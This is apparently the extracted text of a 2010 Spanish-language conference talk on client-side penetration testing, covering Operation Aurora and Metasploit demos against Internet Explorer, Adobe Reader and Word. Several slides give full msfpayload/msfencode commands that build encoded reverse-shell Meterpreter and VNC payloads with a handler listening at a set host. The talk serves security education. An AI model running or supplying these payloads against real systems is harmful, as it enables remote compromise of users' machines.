Leonardo pigner sy_r_campusparty2010

What Work’s On
Client Side Pentesting
CAMPUS PARTY COLOMBIA 2010

I’m a Pentester I’m a User

Leonardo Pigñer

www.base4sec.com

@base4sec

iLife
kungfoosion.com

@kfs
lpigner@base4sec.com

www.linkedin.com/in/lpigner

ekoparty.org
16-17 Septiembre 2010

Agenda
• ¿ Por Qué Client Side ?

• La Operación Aurora

• Distribución y Ataques

• Conclusión

DIFERENTES TIPOS DE PENETRATION TESTING

No! Yo tengo Jodanse!
Wardialing un 0-day para Yo entro
es lo mejor! IIS 6.0! caminando

Phone Attacker Network Attacker Social Engineer

INTERNET

ATACANTE

Firewall
DMZ

LAN

SMTP WWW

DOMINIO BASE DE
DATOS

INTERNET

ATACANTE

Web App FW
IPS
Firewall Reverse Proxy
DMZ IDS

LAN

SMTP WWW

DOMINIO BASE DE
DATOS

INTERNET

Firewall DMZ

LAN

12 de Enero
de 2010

“ataques altamente soﬁsticados y
dirigidos ... originados desde China”

[2] Google Blog: A new approach to China

+ 30
[1] Wikipedia: Operation Aurora

“illegal
ﬂower
tribute”
[4] Wikipedia: Illegal ﬂower tribute

PDF, DOC, XLS, CAD, E-mail
Texas
y el resto...

Taiwan
AR
,R
C AB

[3] Mandiant M-Trends “the advanced persistent threat”

0-day para IE 6-7-8

- 12 de Enero: Anuncio de Google
- 14 de Enero: Exploit en Wepawet
- 14 de Enero: Advisory de Microsoft
- 15 de Enero: PoC de MetaSploit
- 21 de Enero: Microsoft update (fuera de ciclo)

[6] Wepawet exploit
[7] German government warns against using MS Explorer

www

DEMO #1 “Aurora”
Mas información en:
KUNGFOOSION: Estalló la CyberGuerra!

OSVDB 61697
This module exploits a memory corruption flaw in Internet
Explorer. This flaw was found in the wild and was a key
component of the "Operation Aurora" attacks that lead to
the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published
to the Wepawet malware analysis site. The technique used
by this module is currently identical to the public sample, as
such, only Internet Explorer 6 can be reliably exploited.

Afecta a:
- Internet Explorer 6

DEMO #2 “Payload + Encoding”

./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 X > payload_1.exe

./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/
shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t
raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/
call4_dword_xor -c 3 -t exe -o payload_2.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/
reverse_tcp LHOST=192.168.162.138 LPORT=443 E

25000 mails

1883 interesados

Abre mi
adjunto!

Tienes un E-Mail

Archivos Mas Utilizados

3%

38%
47%

7%
4%

DOC XLS PPT
PDF otros

2008
1968
2009
2195
2010
895

[8] PDF Based Target Attacks are Increasing

DEMO #3 “PDF Exploit”
KUNGFOOSION: Explotando el 0-day de Adobe
Reader

OSVDB 61697
This module exploits a buffer overﬂow in Adobe Reader
and Adobe Acrobat Professional < 8.1.3. By creating a
specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.

Afecta a:
- Adobe Reader 8.1.2

+EXE

DEMO #4 “PDF + EXE”
KUNGFOOSION: Embebiendo un Ejecutable dentro
de un PDF con MetaSploit

DEMO #5 “Word”
./msfpayload windows/vncinject/reverse_tcp
LHOST=192.168.162.138 LPORT=443 V >
macro_word.bas

./msfcli exploit/multi/handler PAYLOAD=windows/
vncinject/reverse_tcp LHOST=192.168.162.138
LPORT=443 E

DEMO #6 “USB U3”
KUNGFOOSION: Ataque USB U3 con MetaSploit

SET
social engineering toolkit

“The Java Applet Attack”
KUNGFOOSION: Ingeniería Social con Applets
ﬁrmados de Java en MetaSploit

Gracias!
kungfoosion.com

@kfs
lpigner@base4sec.com

www.linkedin.com/in/lpigner

Leonardo pigner sy_r_campusparty2010

Recomendados

Recomendados

Más contenido relacionado

Similar a Leonardo pigner sy_r_campusparty2010

Similar a Leonardo pigner sy_r_campusparty2010 (20)

Más de campus party

Más de campus party (20)

Último

Último (10)

Leonardo pigner sy_r_campusparty2010